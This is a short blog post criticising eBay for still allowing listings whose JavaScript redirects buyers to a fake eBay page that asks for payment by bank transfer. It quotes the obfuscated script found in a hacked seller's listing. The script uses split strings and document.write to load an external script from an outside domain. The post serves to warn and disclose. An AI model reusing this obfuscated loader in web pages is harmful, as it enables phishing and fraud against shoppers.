Monday, 10 August 2015

eBay still happy to let people be scammed

I wrote back in March about eBay allowing javascript in item listings that redirects the user to a fake ebay site, and it seems that eBay are still happy to let this practice continue. I found the same thing happening to me today, after clicking through on an item I was redirected to a fake eBay site with a But it Now listing requiring bank transfer as the payment.

It was quite a good scam actually as the fake page made it look like it was from a seller that regularly sells expensive items, and has good feedback, and so would be quite trustworthy. Of course, while the actual seller on the real ebay they were pretending to be is very likely trustworthy, the fake seller most definitely would not be.

They were using a hacked account on eBay for the redirecting listing, and included the following js to do the redirection:

var az = "SC";var bz = "RI";var cz = "PT";var dz = "SR";var ez = "C=";var fz = "h"+"t"+"t";var gz = "p"+":/"+"/"+"";var gx = "b"+"u"+"l"+"l"+"k";var fz0 = "b"+"u"+"y"+"u"+"k"+"."+"c"+"o"+"m/TAB."+"J"+"S";document.write ("<"+az+bz+cz+" type='text/javascript'"+dz+ez+fz+gz+gx+fz0+">");document.write("</"+az+bz+cz+">");

Similar to the technique I posted about back in March, but this one appears to be even simpler, with the characters in plain text.

No comments: